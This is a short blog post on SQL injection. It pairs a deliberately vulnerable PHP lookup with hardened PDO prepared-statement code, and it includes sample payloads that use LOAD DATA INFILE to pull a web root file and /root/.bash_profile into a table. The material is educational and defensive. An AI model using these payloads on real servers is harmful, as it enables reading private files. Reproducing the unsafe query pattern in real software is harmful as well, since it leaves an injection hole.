by Andrew Johnstone
I wrote this a while ago whilst playing with SQL Injection; it is a little unfinished, but the idea was to try to write out entire files through an SQL Injection attack.
I thought I would expand on my previous post, Exceptions, Exceptions, Exceptions, and see what is possible with a simple SQL Injection attack. I will base this on the assumption that if you’ve managed to overlook an arbitrary SQL Injection attack, there will be vulnerable output somewhere.
```php
// Cast id to an integer; default to 0 when it is missing.
$id = isset($_REQUEST['id']) ? (int) $_REQUEST['id'] : 0;
// The search term is taken from the request unmodified.
$SearchTerm = isset($_REQUEST['q']) ? $_REQUEST['q'] : null;

if ($id != 0 && !empty($SearchTerm)) {
    // $SearchTerm is interpolated straight into the statement: this is the injection point.
    $SQL = "SELECT id, StartDate, EndDate, Title FROM Table_One WHERE id={$id} AND Title='{$SearchTerm}';";
    // The raw MySQL error is echoed back to the client on failure.
    $Query = mysql_query($SQL) or die('Query Error: '.mysql_error());
    $Row = mysql_fetch_array($Query, MYSQL_ASSOC);
    if (!empty($Row['Title'])) {
        print $Row['Title'];
    }
}
```

A couple of experiments with SQL injection:

```
LOAD%20DATA%20INFILE%20'/home/httpd/vhosts/ajohnstone.com/httpdocs/index.php'%20INTO%20TABLE%20test.OUTRUN;
LOAD DATA INFILE '/root/.bash_profile' INTO TABLE test.OUTRUN;
string(96) "LOAD DATA INFILE '/home/httpd/vhosts/ajohnstone.com/httpdocs/index.php' INTO TABLE test(Output);"
Query Error: Access denied for user 'user@'localhost' (using password: YES)
```
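A hardened form of the lookup above, as an added example that is not code from the original post: the query uses PDO prepared statements, the title is encoded on output, and database errors are logged rather than printed. The DSN, credentials and the `findTitle()` helper are hypothetical placeholders.

```php
<?php
// Added example, not from the original post. Assumed names: findTitle(),
// example_db, app_user, app_password are placeholders.

function findTitle(PDO $pdo, $rawId, $rawTerm): ?string
{
    // Accept only a positive integer id and a non-empty string term.
    // Arrays (e.g. ?q[]=x) and missing values are rejected here.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false || !is_string($rawTerm) || $rawTerm === '') {
        return null;
    }

    // Placeholders keep request data out of the SQL text, so a quote in
    // the search term can no longer terminate the string literal.
    $stmt = $pdo->prepare(
        'SELECT Title FROM Table_One WHERE id = :id AND Title = :title'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->bindValue(':title', $rawTerm, PDO::PARAM_STR);
    $stmt->execute();

    $title = $stmt->fetchColumn();
    return $title === false ? null : (string) $title;
}

try {
    // The application account should not hold the MySQL FILE privilege,
    // which server-side LOAD DATA INFILE requires.
    $pdo = new PDO(
        'mysql:host=localhost;dbname=example_db;charset=utf8mb4',
        'app_user',
        'app_password',
        [
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES => false, // server-side prepares
        ]
    );
    $title = findTitle($pdo, $_REQUEST['id'] ?? null, $_REQUEST['q'] ?? null);
    if ($title !== null) {
        // Encode on output so a stored value cannot inject markup.
        print htmlspecialchars($title, ENT_QUOTES, 'UTF-8');
    }
} catch (PDOException $e) {
    // Keep driver errors in the server log instead of the response body.
    error_log('Query failed: ' . $e->getMessage());
    http_response_code(500);
}
```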
I have been a developer for roughly 10 years and have worked with an extensive range of technologies. Whilst working for relatively small companies, I have worked with all aspects of the development life cycle, which has given me a broad and in-depth experience.